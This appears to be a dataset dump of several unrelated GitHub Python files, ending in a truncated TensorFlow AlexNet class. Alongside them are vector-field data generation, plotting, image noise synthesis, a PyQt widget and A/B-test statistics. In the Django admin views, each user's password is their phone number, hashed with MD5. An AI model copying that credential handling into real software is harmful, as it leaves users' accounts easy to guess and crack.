\"\"\"\r\n Add gaussian noise to vectors\r\n \"\"\"\r\n noise = np.random.normal(scale=noise_level, size=vectors.shape)\r\n return vectors + noise\r\n\r\n def noise_vectors_mask(self, vectors, noise_level, empty_val=np.nan):\r\n \"\"\"\r\n Add mask noise to vectors\r\n \"\"\"\r\n vectors = vectors.copy()\r\n mask = np.random.uniform(size=np.array(vectors.shape)[:-1]) < noise_level\r\n vectors[mask, :] = empty_val #\r\n return vectors\r\n\r\n def noise_vectors(self, vectors, noise_type, noise_level):\r\n \"\"\"\r\n Add noise to parameters\r\n \"\"\"\r\n if noise_type == 'gaussian':\r\n return self.noise_vectors_gaussian(vectors, noise_level)\r\n if noise_type == 'mask':\r\n return self.noise_vectors_mask(vectors, noise_level)\r\n else:\r\n return vectors\r\n\r\n \r\n\r\n\r\n def augment_normalizing_flow_with_rejection(self, DE, ntries=10, **kwargs_aug):\r\n \"\"\"\r\n Augment normalizing flow with rejection sampling\r\n :param DE: FlowSystemODE\r\n \"\"\"\r\n \r\n for i in range(ntries):\r\n \r\n vectors_new, fixed_pts = augment_normalizing_flow(DE, **kwargs_aug)\r\n if fixed_pts is None:\r\n break\r\n\r\n fixed_pts_isin = DE.get_pts_isin(fixed_pts,)\r\n # is_inbound = True\r\n # for fp in fixed_pts:\r\n # inbound = [ (fp[i] >= DE.min_dims[i]) & (fp[i] <= DE.max_dims[i]) for i in range(DE.dim)]\r\n # is_inbound = is_inbound & np.all(inbound)\r\n \r\n \r\n if np.all(fixed_pts_isin): # checking if all points are inside\r\n break\r\n \r\n \r\n if (i == ntries-1):\r\n print(fixed_pts)\r\n print(i)\r\n print('Could not find a flow that flows inside the coords boundaries')\r\n\r\n\r\n return vectors_new, fixed_pts\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n######################################## Params noise functions ########################################################\r\n\r\n \r\n def noise_params(self, params, noise_type, noise_level):\r\n \"\"\"\r\n Add noise to parameters\r\n \"\"\"\r\n if noise_type == 'params_gaussian':\r\n return self.noise_vectors_gaussian(params, noise_level)\r\n else:\r\n return params\r\n\r\n######################################## Data generation ########################################################\r\n\r\n def generate_flows(self, num_samples, noise_type=None, noise_level=None, sampler_type='random', params=None, \r\n interpolate_missing=False, add_sand=False, add_traj=False, augment_type=None, augment_ntries=10, max_topos=3, T=100, alpha=0.1, **kwargs_aug):\r\n \"\"\"\r\n Generate original and perturbed params and flows\r\n \"\"\"\r\n \r\n sampler = SystemFamily.get_sampler(sampler_type)\r\n params = params if params else sampler(self, num_samples)\r\n \r\n params_pert = self.noise_params(params, noise_type, noise_level=noise_level)\r\n \r\n vectors = []\r\n vectors_pert = []\r\n\r\n DEs = []\r\n DEs_pert = []\r\n\r\n sand = []\r\n sand_pert = []\r\n\r\n trajs = []\r\n trajs_pert = []\r\n\r\n fixed_pts = []\r\n fixed_pts_pert = []\r\n\r\n dists = []\r\n dists_pert = []\r\n\r\n topos = []\r\n topos_pert = []\r\n\r\n poly_params = []\r\n poly_params_pert = []\r\n\r\n\r\n for p, p_pert in zip(params, params_pert):\r\n\r\n DE = self.DE(params=p, **self.data_info)\r\n coords, v = DE.get_vector_field()\r\n \r\n DE_pert = self.DE(params=p_pert, **self.data_info)\r\n\r\n if noise_type == 'trajectory':\r\n print('Works well in odes but not here, check!') # TODO: fix this\r\n _, v_pert = DE_pert.get_vector_field_from_trajectories(n_trajs=noise_level, T=5, alpha=0.01)\r\n # plt.quiver(coords[...,0], coords[...,1], v[...,0], v[...,1])\r\n # plt.quiver(coords[...,0], coords[...,1], v_pert[...,0], v_pert[...,1], color='r')\r\n else:\r\n _, v_pert = DE_pert.get_vector_field()\r\n\r\n # fixed points\r\n fp = DE.get_fixed_pts()\r\n if augment_type:\r\n v_pert, fp_pert = self.augment_normalizing_flow_with_rejection(DE_pert, augment_type=augment_type, ntries=augment_ntries, **kwargs_aug)\r\n else:\r\n fp_pert = DE_pert.get_fixed_pts()\r\n \r\n # distance from bifurcation\r\n dist = DE.get_dist_from_bifur()\r\n dist_pert = DE_pert.get_dist_from_bifur()\r\n \r\n no_pert = False\r\n if np.all(np.isclose(v, v_pert)):\r\n no_pert = True\r\n\r\n if add_sand:\r\n image = DE.get_sand_image()\r\n image_pert = image if no_pert else DE_pert.get_sand_image()\r\n sand.append(image)\r\n sand_pert.append(image_pert)\r\n\r\n if add_traj:\r\n init = [np.random.random() * (DE.max_dims[i] - DE.min_dims[i]) + DE.min_dims[i] for i in range(DE.dim)]\r\n traj = DE.run(T=T, alpha=alpha, init=torch.Tensor(init))\r\n init = [np.random.random() * (DE_pert.max_dims[i] - DE_pert.min_dims[i]) + DE_pert.min_dims[i] for i in range(DE_pert.dim)]\r\n traj_pert = traj if no_pert else DE_pert.run(T=T, alpha=alpha, init=torch.Tensor(init))\r\n trajs.append(traj)\r\n trajs_pert.append(traj_pert)\r\n \r\n tps = DE.get_topology()\r\n if len(tps) < max_topos:\r\n tps += [0] * (max_topos - len(tps))\r\n if len(tps) > max_topos:\r\n print(f'WARNING: more than {max_topos} topologies found for {self.data_name}. Truncating to first {max_topos}.')\r\n tps = tps[:max_topos]\r\n \r\n pp = DE.get_polynomial_representation()\r\n pp = pp if pp else DE.fit_polynomial_representation()\r\n if np.isclose(v, v_pert).all(): # no perturbation\r\n pp_pert = pp\r\n else:\r\n pp_pert = DE_pert.fit_polynomial_representation(coords=coords, vectors=v_pert)\r\n \r\n pp = np.stack(pp).T.flatten()\r\n pp_pert = np.stack(pp_pert).T.flatten()\r\n \r\n \r\n fixed_pts_pert.append(fp_pert)\r\n fixed_pts.append(fp)\r\n dists_pert.append(dist_pert)\r\n dists.append(dist)\r\n vectors.append(v)\r\n vectors_pert.append(v_pert)\r\n DEs.append(DE)\r\n DEs_pert.append(DE_pert)\r\n topos.append(tps)\r\n topos_pert.append(tps)\r\n poly_params.append(pp)\r\n poly_params_pert.append(pp_pert)\r\n\r\n \r\n\r\n vectors = np.stack(vectors)\r\n vectors_pert = np.stack(vectors_pert)\r\n\r\n sand = np.stack(sand) if len(sand) else None\r\n sand_pert = np.stack(sand_pert) if len(sand_pert) else None\r\n\r\n trajs = np.stack(trajs) if len(trajs) else None\r\n trajs_pert = np.stack(trajs_pert) if len(trajs_pert) else None\r\n\r\n vectors_pert = self.noise_vectors(vectors_pert, noise_type, noise_level=noise_level)\r\n\r\n topos = np.stack(topos)\r\n topos_pert = np.stack(topos_pert)\r\n \r\n dists = np.stack(dists)\r\n dists_pert = np.stack(dists_pert)\r\n \r\n poly_params = np.stack(poly_params)\r\n poly_params_pert = np.stack(poly_params_pert)\r\n\r\n return {'params_pert': params_pert.astype('float32'), \r\n 'vectors_pert': vectors_pert, \r\n 'DEs_pert': DEs_pert, \r\n 'poly_params_pert': poly_params_pert, \r\n 'sand_pert': sand_pert,\r\n 'trajs_pert': trajs_pert, \r\n 'fixed_pts_pert': fixed_pts_pert, \r\n 'dists_pert': dists_pert, \r\n 'topos_pert': topos_pert, \r\n 'params': params.astype('float32'), \r\n 'vectors': vectors, \r\n 'DEs': DEs, \r\n 'poly_params': poly_params, \r\n 'trajs': trajs,\r\n 'sand': sand, \r\n 'fixed_pts': fixed_pts, \r\n 'dists': dists,\r\n 'topos': topos\r\n }\r\n\r\n \r\n######################################## Plotting ########################################################\r\n\r\n def plot_noised_vector_fields(self, num_samples, noise_type, noise_level, params=None, add_trajectories=False, title='', **kwargs):\r\n \"\"\"\r\n Plot original and perturbed vector fields\r\n \"\"\"\r\n _, flow_pert, DEs_pert, _, _, flow, DEs, _ = self.generate_flows(num_samples=num_samples, params=params, noise_type=noise_type, noise_level=noise_level, **kwargs)\r\n # self.plot_vector_fields(params_pert, flow_pert, params, flow, **kwargs)\r\n nrows = num_samples\r\n ncols = 2 + (add_trajectories * 2)\r\n fig, axs = plt.subplots(nrows, ncols, figsize=(10,5), tight_layout=False, constrained_layout=True)\r\n for i, (f, f_pert, DE, DE_pert) in enumerate(zip(flow, flow_pert, DEs, DEs_pert)):\r\n DE.plot_vector_field(vectors=f, ax=axs[i, 0])\r\n DE_pert.plot_vector_field(vectors=f_pert, ax=axs[i, 1 + add_trajectories])\r\n if add_trajectories:\r\n DE.plot_trajectory(vectors=f, ax=axs[i, 1])\r\n DE_pert.plot_trajectory(vectors=f_pert, ax=axs[i, 3])\r\n plt.suptitle(title)\r\n plt.show()\r\n \r\n def plot_vector_fields(self, params=None, sampler_type='uniform', add_trajectories=False, **kwargs):\r\n \"\"\"\r\n Plot vector fields of system\r\n :param params: array of params for system\r\n :param param_selection: plot extreme (minimal, intermediate and maximal bounds) param combinations\r\n :param kwargs: additional params for sampling method\r\n \"\"\"\r\n sampler = SystemFamily.get_sampler(sampler_type)\r\n params = sampler(self, **kwargs)\r\n num_samples = params.shape[0]\r\n skip = 1\r\n\r\n nrow = ncol = int(np.ceil(np.sqrt(num_samples)))\r\n if add_trajectories:\r\n ncol = 2\r\n nrow = num_samples\r\n skip = 2\r\n \r\n fig, axs = plt.subplots(nrow, ncol, figsize=(6*ncol, 6*nrow), tight_layout=False, constrained_layout=True)\r\n axs = axs.flatten()\r\n for i in range(num_samples):\r\n ax = axs[skip*i]\r\n model = self.generate_model(params[i, :])\r\n model.plot_vector_field(ax=ax)\r\n if add_trajectories:\r\n ax = axs[skip*i+1]\r\n model.plot_trajectory(ax=ax)\r\n \r\n plt.tight_layout()\r\n plt.show()\r\n\r\n","repo_name":"nitzanlab/time-warp-attend","sub_path":"twa/data/system_family.py","file_name":"system_family.py","file_ext":"py","file_size_in_byte":19922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"17623784473","text":"from django.core.checks import messages\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom django.contrib.auth.models import User, UserManager, auth\nfrom django.contrib import messages\nfrom django.http import HttpResponse\nimport random\nfrom user.models import Notification, User, Machine\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.contrib.auth.hashers import make_password, check_password\n# Create your views here.\n\n\n@login_required(login_url='/page/admin')\ndef dashboard(request):\n cobot = Machine.objects.filter(machine_type=\"Cobot\").count()\n machine = Machine.objects.filter(machine_type=\"Machine\").count()\n users = User.objects.count()\n notification = Notification.objects.count()\n context = {}\n context['cobot'] = cobot\n context['machine'] = machine\n context['users'] = users\n context['notification'] = notification\n context['title'] = \"Admin Dashboard\"\n return render(request, 'backend/index.html', context)\n\n\n@login_required(login_url='/page/admin')\ndef new_user(request):\n if request.method == \"POST\" and request.FILES['user_picture']:\n first_name = request.POST['first_name']\n last_name = request.POST['last_name']\n user_picture = request.FILES['user_picture']\n email = request.POST['email']\n phone = request.POST['phone']\n user_category = request.POST['user_category']\n user_status = \"Active\"\n password = make_password(phone, None, 'md5')\n user = User.objects.create(\n first_name=first_name, last_name=last_name, email=email,\n user_category=user_category, phone=phone, password=password, user_picture=user_picture, user_status=user_status)\n user.save()\n\n messages.info(\n request, 'User Profile was successfully Created')\n return redirect('new_user')\n\n else:\n title = \"New User\"\n return render(request, 'backend/new-user.html', {'title': title})\n\n\n@login_required(login_url='/page/admin')\ndef all_users(request):\n title = \"All User\"\n user = User.objects.all().order_by('-id')\n paginator = Paginator(user, 20)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n\n return render(request, 'backend/all-users.html', {'title': title, 'user': page_obj})\n\n\n\n@login_required(login_url='/page/admin')\ndef edit_user(request, id):\n users = User.objects.get(id=id)\n if request.method == \"POST\" and request.FILES['user_picture']:\n phone = request.POST['phone']\n users.first_name = request.POST['first_name']\n users.last_name = request.POST['last_name']\n users.user_picture = request.FILES['user_picture']\n users.email = request.POST['email']\n users.password = make_password(phone, None, 'md5')\n users.user_category = request.POST['user_category']\n users.save()\n\n messages.info(\n request, 'User was Edited successful')\n return redirect('edit_user', id=users.id)\n\n else:\n title = \"Edit User\"\n return render(request, 'backend/edit-user.html', {'title': title, 'user': users})\n\n\n@login_required(login_url='/page/admin')\ndef user_status(request, id, status):\n user_id = id\n users = User.objects.get(id=id)\n users.user_status = status\n users.save()\n\n messages.info(\n request, 'User status was Edited successful')\n return redirect('all_users')\n\n@login_required(login_url='/page/admin')\ndef delete_user(request, id):\n users = User.objects.get(id=id)\n users.delete()\n return redirect('all_users')\n\n\n@login_required(login_url='/page/admin')\ndef new_machine(request):\n users = User.objects.filter(user_category=\"Expert\")\n worker = User.objects.filter(user_category=\"Worker\")\n serviceman = User.objects.filter(user_category=\"Serviceman\")\n if request.method == \"POST\" and request.FILES['machine_picture']:\n machine_name = request.POST['machine_name']\n machine_code = request.POST['machine_code']\n machine_picture = request.FILES['machine_picture']\n machine_expert = request.POST['machine_expert']\n machine_worker = request.POST['machine_worker']\n machine_serviceman = request.POST['machine_serviceman']\n machine_type = request.POST['machine_type']\n machine_status = \"Running\"\n\n post = Machine.objects.create(\n machine_name=machine_name, machine_code=machine_code,\n machine_expert=User.objects.get(id=int(machine_expert)), machine_worker=User.objects.get(id=int(machine_worker)), \n machine_serviceman=User.objects.get(id=int(machine_serviceman)),machine_type=machine_type, machine_picture=machine_picture, machine_status=machine_status)\n post.save()\n\n messages.info(\n request, 'Machine information was successfully Created')\n return redirect('new_machine')\n\n else:\n title = \"New Machine\"\n return render(request, 'backend/machine/new-machine.html', {'title': title, 'user': users, 'worker':worker, 'serviceman':serviceman})\n\n\n@login_required(login_url='/page/admin')\ndef all_machine(request):\n title = \"All Machines\"\n user = Machine.objects.all().order_by('-id')\n paginator = Paginator(user, 20)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n\n return render(request, 'backend/machine/all-machine.html', {'title': title, 'user': page_obj})\n\n\n@login_required(login_url='/page/admin')\ndef edit_machine(request, id):\n post = Machine.objects.get(id=id)\n users = User.objects.filter(user_category=\"Expert\")\n worker = User.objects.filter(user_category=\"Worker\")\n serviceman = User.objects.filter(user_category=\"Serviceman\")\n if request.method == \"POST\" and request.FILES['machine_picture']:\n machine_expert = request.POST['machine_expert']\n machine_worker = request.POST['machine_worker']\n machine_serviceman = request.POST['machine_serviceman']\n\n\n post.machine_name = request.POST['machine_name']\n post.machine_picture = request.FILES['machine_picture']\n post.machine_expert = User.objects.get(id=int(machine_expert))\n post.machine_worker = User.objects.get(id=int(machine_worker))\n post.machine_serviceman = User.objects.get(id=int(machine_serviceman))\n post.machine_type = request.POST['machine_type']\n post.save()\n\n messages.info(\n request, 'Machine was Edited successful')\n return redirect('edit_machine', id=post.id)\n\n else:\n title = \"Edit Machine\"\n return render(request, 'backend/machine/edit-machine.html', {'title': title, 'post': post, 'user': users, 'worker':worker, 'serviceman':serviceman})\n\n\n@login_required(login_url='/page/admin')\ndef delete_machine(request, id):\n users = Machine.objects.get(id=id)\n users.delete()\n return redirect('all_machine')\n\n\n@login_required(login_url='/page/admin')\ndef new_notification(request):\n machine = Machine.objects.all().order_by('-id')\n if request.method == \"POST\":\n request_type = request.POST['request']\n title = request.POST['request_title']\n description = request.POST['description']\n machine_name = request.POST['machine_name']\n not_status = \"Active\"\n user = Notification.objects.create(\n request=request_type, machine_id=Machine.objects.get(id=int(machine_name)), title=title, description=description,not_status=not_status)\n user.save()\n\n messages.info(\n request, 'Notification was successfully Created')\n return redirect('new_notification')\n\n else:\n title = \"New Notification\"\n return render(request, 'backend/notification/new-notification.html', {'title': title, 'machine': machine})\n\n@login_required(login_url='/page/admin')\ndef all_notification(request):\n title = \"All Notification\"\n user = Notification.objects.all().order_by('-id')\n paginator = Paginator(user, 20)\n page_number = request.GET.get('page')\n page_obj = paginator.get_page(page_number)\n\n return render(request, 'backend/notification/all-notification.html', {'title': title, 'user': page_obj})\n\n@login_required(login_url='/page/admin')\ndef notification_status(request, id, status):\n users = Notification.objects.get(id=id)\n users.not_status = status\n users.save()\n\n messages.info(\n request, 'Notification status was Edited successful')\n return redirect('all_notification')\n\n\n@login_required(login_url='/page/admin')\ndef delete_notification(request, id):\n users = Notification.objects.get(id=id)\n users.delete()\n return redirect('all_notification')\n\n\n\ndef logout(request):\n auth.logout(request)\n return redirect('/')\n\n\n","repo_name":"aniebue/remote_manufacturing","sub_path":"user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"20937646395","text":"import pandas as pd\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\n\nfrom batch_experiment import dso_filenames\n\nrmse_file1 = sys.argv[1]\nrmse_file2 = sys.argv[2]\nname_template = ''\nif len(sys.argv)>3:\n name_template = sys.argv[3]\nplot_filename = name_template + '_accumulative_plot'\n# threshold = sys.argv[2]\nrmse_results1 = pd.read_csv(rmse_file1, sep = ',', header = 0, index_col=0)\nrmse_results2 = pd.read_csv(rmse_file2, sep = ',', header = 0, index_col=0)\n# print(rmse_results)\n\n# print(rmse_results.le(float(threshold)))\n# print(rmse_results.le(float(threshold)).sum().sum())\nprint(rmse_results1[0:5])\n\naccumulative_counts1 = []\naccumulative_counts2 = []\nthresholds_range = np.arange(0,0.42,0.01)\n\n# selected_option = [0,2,4,6,8,10,12,14]\nselected_option = range(0,16)\n\n#selected_option = range(0,rmse_results1.shape[1])\nfor threshold in thresholds_range:\n count1 = rmse_results1.iloc[0:5,selected_option].le(float(threshold)).sum().sum()\n accumulative_counts1.append(count1)\n\n count2 = rmse_results2.iloc[0:5,selected_option].le(float(threshold)).sum().sum()\n accumulative_counts2.append(count2)\n\nfig, ax = plt.subplots()\nplt.plot(thresholds_range, accumulative_counts1, 'b')\nplt.plot(thresholds_range, accumulative_counts2, '-r*')\nprint('saving plots to ', plot_filename)\nplt.savefig(plot_filename)\nplt.show()\n\nprint(rmse_results2.iloc[0:5,selected_option].le(0.4).sum().sum())\n\n\n","repo_name":"amberwood31/posegraph_process_scripts","sub_path":"compare_rmse_plot.py","file_name":"compare_rmse_plot.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"22494596966","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 21 00:30:15 2021\n\n@author: chxy\n\"\"\"\n\nimport os\nimport os.path as osp\nimport sys\nsys.path.append('/home/ubuntu/code/mmdetection/mmdet/datasets/pipelines/noisemodel/')\n\nimport numpy as np\nfrom PIL import Image\n\nfrom process import process\nfrom unprocess import unprocess\nfrom dark_noising import *\n\n\ndef main(input_folder, output_folder, noise_type):\n if not osp.exists(output_folder):\n os.mkdir(output_folder)\n\n if noise_type == 'gaussian':\n noisemodel = NoiseModel(model='g', camera='CanonEOS5D4') # 初始化noisemodel,噪声类型为'g',标定相机为CanonEOS5D4\n elif noise_type == 'gaussian-poisson':\n noisemodel = NoiseModel(model='pg', camera='CanonEOS5D4') # 初始化noisemodel,噪声类型为'pg',标定相机为CanonEOS5D4\n elif noise_type == 'physics-based':\n noisemodel = NoiseModel(model='PGBRU', camera='CanonEOS5D4') # 初始化noisemodel,噪声类型为'PGBRU',标定相机为CanonEOS5D4\n\n for filename in sorted(os.listdir(input_folder)):\n image = Image.open(osp.join(input_folder, filename)) # 读取图像\n if image.mode != 'RGB':\n image = image.convert(\"RGB\")\n W, H = image.size\n\n # resize for mosaic in unprocessing\n image = image.resize((W // 2 * 2, H // 2 * 2)) # mosaic需要图像尺寸为偶数\n\n image = np.array(image).astype(np.float32) / 255. # 像素值归一化\n raw, metadata = unprocess(image) # unprocess成四通道raw,按RGBG排列\n\n if noise_type is None:\n # dark_raw = adjust_random_brightness(raw, s_range=(0.2, 0.4)) # 随机调整pixel强度值在s_range范围内\n dark_raw = raw\n\n else:\n noisy_raw = noisemodel(raw) # 添加噪声\n noisy_raw = np.clip(noisy_raw, 0, 1) # 取值限定0~1\n # dark_raw = adjust_random_brightness(noisy_raw, s_range=(0.2, 0.4)) # 随机调整pixel强度值在s_range范围内\n dark_raw = noisy_raw\n\n result = process(dark_raw, (W, H)) # 将四通道raw转换成三通道RGB(不进行白平衡和颜色校正),并resize保持与输入一致\n result = Image.fromarray(result)\n result.save(osp.join(output_folder, filename[:-4] + '.png')) # 保存图像\n\n\nif __name__ == \"__main__\":\n main(input_folder=r'/home/ubuntu/2TB/dataset/VOCdevkit/VOC2012/JPEGImages', # 输入文件夹路径(COCO、VOC原图)\n output_folder=r'/home/ubuntu/2TB/dataset/VOCdevkit/VOC2012/Gaussian',\n # 输出文件夹路径:unp_None, unp_gaussian, unp_gaussian-poisson, unp_physics-based\n noise_type='gaussian') # 可选噪声类型:None, 'gaussian', 'gaussian-poisson', 'physics-based'\n","repo_name":"Linwei-Chen/LIS","sub_path":"mmdetection/mmdet/datasets/pipelines/noisemodel/synthesis.py","file_name":"synthesis.py","file_ext":"py","file_size_in_byte":2750,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"71"}
+{"seq_id":"15539607350","text":"from PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\n\n# Personal libraries\nfrom ..inputs.SpinInput import SpinInput\n\n\nclass AttitudeWidget(QWidget):\n\t\"\"\"Widget composed of four SpinInput widgets.\n\t\n\tAllow the user to send manually attitude to the drone.\n\t\n\tInherits from QWidget.\n\t\n\tOverrides: __init__\n\t\"\"\"\n\t\n\tdef __init__(self, parent):\n\t\t\"\"\"Creates inputs.\n\t\t\n\t\tArgs:\n\t\t\tparent (QWidget): The parent widget to insert instance\n\t\t\"\"\"\n\t\t\n\t\tsuper(AttitudeWidget, self).__init__(parent)\n\t\t\n\t\t# GridLayout for main layout\n\t\tself.layout = QGridLayout()\n\t\tself.setLayout(self.layout)\n\t\t\n\t\t# Roll (deg)\n\t\tlabel = QLabel('Roll (deg):')\n\t\tself.roll = SpinInput(self, -180, 180)\n\t\tself.roll.setValue(0)\n\t\tself.layout.addWidget(label, 0, 0)\n\t\tself.layout.addWidget(self.roll, 0, 1)\n\t\t\n\t\t# Pitch (deg)\n\t\tlabel = QLabel('Pitch (deg):')\n\t\tself.pitch = SpinInput(self, -180, 180)\n\t\tself.pitch.setValue(0)\n\t\tself.layout.addWidget(label, 1, 0)\n\t\tself.layout.addWidget(self.pitch, 1, 1)\n\t\t\n\t\t# Yaw (deg)\n\t\tlabel = QLabel('Yaw (deg):')\n\t\tself.yaw = SpinInput(self, -180, 180)\n\t\tself.yaw.setValue(0)\n\t\tself.layout.addWidget(label, 2, 0)\n\t\tself.layout.addWidget(self.yaw, 2, 1)\n\t\t\n\t\t# Thrust (%)\n\t\tlabel = QLabel('Thrust (%):')\n\t\tself.thrust = SpinInput(self, 0, 100)\n\t\tself.thrust.setValue(0)\n\t\tself.layout.addWidget(label, 3, 0)\n\t\tself.layout.addWidget(self.thrust, 3, 1)\n\t\t\n\t\t# Stretch\n\t\tself.layout.setRowStretch(self.layout.rowCount(), 1)\n\t\tself.layout.setColumnStretch(self.layout.columnCount(), 1)\n\t\t\n\tdef getValues(self):\n\t\t\"\"\"Returns the current values of attitude (int tuple).\"\"\"\n\t\troll = self.roll.getValue()\n\t\tpitch = self.pitch.getValue()\n\t\tyaw = self.yaw.getValue()\n\t\tthrust = self.thrust.getValue()\n\t\t\n\t\treturn roll, pitch, yaw, thrust\n\t\t\n\tdef setValues(self, roll, pitch, yaw, thrust):\n\t\t\"\"\"Changes the values of the manual inputs.\n\t\t\n\t\tArgs:\n\t\t\troll (int): Roll trim (deg)\n\t\t\tpitch (int): Pitch trim (deg)\n\t\t\tyaw (int): Yaw trim (deg)\n\t\t\tthrust (float): Thrust trim (%)\n\t\t\"\"\"\n\t\tself.roll.setValue(int(roll))\n\t\tself.pitch.setValue(int(pitch))\n\t\tself.yaw.setValue(int(yaw))\n\t\tself.thrust.setValue(int(thrust))\n","repo_name":"Adrien4193/windshape","sub_path":"src/windshape/gui/widgets/tabs/AttitudeWidget.py","file_name":"AttitudeWidget.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73235427428","text":"import math\nimport numpy as np\nimport pandas as pd\nimport statsmodels.stats.api as sms\nimport streamlit as st\nfrom scipy.stats import norm\n\nfrom source.utils import get_alpha\nfrom source.utils import get_beta\nfrom source.utils import permutation\n\n\ndef calculate_proportions_sample(\n control_conversion,\n sensitivity,\n alternative,\n confidence_level,\n power,\n):\n treatment_conversion = control_conversion * (1 + sensitivity)\n alpha = get_alpha(confidence_level)\n\n # Cohen's h\n effect_size = sms.proportion_effectsize(control_conversion,\n treatment_conversion)\n analysis = sms.TTestIndPower()\n treatment_sample = math.ceil(analysis.solve_power(\n effect_size,\n alternative=alternative,\n alpha=alpha,\n power=power,\n ratio=1,\n ))\n control_sample = treatment_sample\n\n return control_sample, treatment_sample\n\n\ndef calculate_means_sample(\n sensitivity,\n confidence_level,\n power,\n control_ratio,\n treatment_ratio,\n df,\n):\n alpha = get_alpha(confidence_level)\n beta = get_beta(power)\n\n z_alpha = norm.ppf(1 - alpha / 2)\n z_beta = norm.ppf(1 - beta)\n a = 1 / control_ratio + 1 / treatment_ratio\n b = pow(z_alpha + z_beta, 2)\n\n std_dev = df[\"measurement\"].std()\n\n total_sample = math.ceil(a * b / pow(sensitivity / std_dev, 2))\n control_sample = math.ceil(total_sample * control_ratio)\n treatment_sample = math.ceil(total_sample * treatment_ratio)\n\n return control_sample, treatment_sample\n\n\ndef evaluate_proportions_significance(\n control_users,\n treatment_users,\n control_conversions,\n treatment_conversions,\n confidence_level,\n):\n alpha = get_alpha(confidence_level)\n control_effect = control_conversions / control_users\n treatment_effect = treatment_conversions / treatment_users\n observed_diff = treatment_effect - control_effect\n\n conversion = [0] * (control_users + treatment_users)\n conversion.extend([1] * (control_conversions + treatment_conversions))\n conversion = pd.Series(conversion)\n\n perm_diffs = []\n i = 1000\n my_bar = st.progress(0)\n for percent_complete in range(i):\n perm_diffs.append(\n permutation(\n conversion,\n control_users + control_conversions,\n treatment_users + treatment_conversions,\n )\n )\n my_bar.progress((percent_complete + 1) / i)\n\n p_value = np.mean([diff > observed_diff for diff in perm_diffs])\n\n return control_effect, treatment_effect, observed_diff, alpha, p_value\n\n\ndef evaluate_means_significance(\n confidence_level,\n df,\n):\n alpha = get_alpha(confidence_level)\n\n measurements = df[\"measurement\"]\n control_users = df[df[\"group\"] == \"control\"].shape[0]\n treatment_users = df[df[\"group\"] == \"treatment\"].shape[0]\n\n control_mean = df[df[\"group\"] == \"control\"][\"measurement\"].mean()\n treatment_mean = df[df[\"group\"] == \"treatment\"][\"measurement\"].mean()\n observed_diff = treatment_mean - control_mean\n\n perm_diffs = []\n i = 1000\n my_bar = st.progress(0)\n for percent_complete in range(i):\n perm_diffs.append(\n permutation(measurements, control_users, treatment_users)\n )\n my_bar.progress((percent_complete + 1) / i)\n\n p_value = np.mean([diff > abs(observed_diff) for diff in perm_diffs])\n\n return control_mean, treatment_mean, observed_diff, alpha, p_value\n\n","repo_name":"gabrieltempass/ab-tester","sub_path":"source/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"}
+{"seq_id":"177428826","text":"import tensorflow as tf\n\n# https://arxiv.org/pdf/1612.01452.pdf\n\n# https://github.com/ducha-aiki/caffenet-benchmark/blob/master/batchnorm.md\n # Regarding DB before or after activation. \n # Regarding type of activation: ReLu, PReLU, RReLU...etc\n\n# ReLU intitialized HeNormal: https://arxiv.org/pdf/1502.01852.pdf\n\nclass Alexnet_bn(object):\n\n def __init__(self, scope_name, image_width = 224, image_height = 224, image_depth = 1, num_labels = 17, learning_rate = 0.05, phase=0):\n self.scope_name = scope_name\n self.learning_rate = learning_rate\n self.image_width = image_width\n self.image_height = image_height\n self.image_depth = image_depth\n self.num_labels = num_labels\n self.phase = phase # 0=inference, 1=train\n\n EPSILON = 1e-3 # For batch normalization ops\n\n ALEX_FILTER_DEPTH_1, ALEX_FILTER_DEPTH_2, ALEX_FILTER_DEPTH_3 = 96, 256, 384\n ALEX_FILTER_SIZE_1, ALEX_FILTER_SIZE_2, ALEX_FILTER_SIZE_3, ALEX_FILTER_SIZE_4 = 11, 5, 3, 3\n ALEX_NUM_HIDDEN_1, ALEX_NUM_HIDDEN_2 = 4096, 4096\n\n with tf.variable_scope(self.scope_name):\n\n # WEIGHTS AND BIASES ==========================================================================\n self.w1 = tf.get_variable(name=\"w1\", shape=[ALEX_FILTER_SIZE_1, ALEX_FILTER_SIZE_1, image_depth, ALEX_FILTER_DEPTH_1], initializer=tf.keras.initializers.he_normal())\n self.b1 = tf.get_variable(name=\"b1\", shape=[ALEX_FILTER_DEPTH_1], initializer=tf.initializers.zeros())\n\n self.w2 = tf.get_variable(name=\"w2\", shape=[ALEX_FILTER_SIZE_2, ALEX_FILTER_SIZE_2, ALEX_FILTER_DEPTH_1, ALEX_FILTER_DEPTH_2], initializer=tf.keras.initializers.he_normal())\n self.b2 = tf.get_variable(name=\"b2\", shape=[ALEX_FILTER_DEPTH_2], initializer=tf.ones_initializer())\n\n self.w3 = tf.get_variable(name=\"w3\", shape=[ALEX_FILTER_SIZE_3, ALEX_FILTER_SIZE_3, ALEX_FILTER_DEPTH_2, ALEX_FILTER_DEPTH_3], initializer=tf.keras.initializers.he_normal())\n self.b3 = tf.get_variable(name=\"b3\", shape=[ALEX_FILTER_DEPTH_3], initializer=tf.initializers.zeros())\n\n self.w4 = tf.get_variable(name=\"w4\", shape=[ALEX_FILTER_SIZE_4, ALEX_FILTER_SIZE_4, ALEX_FILTER_DEPTH_3, 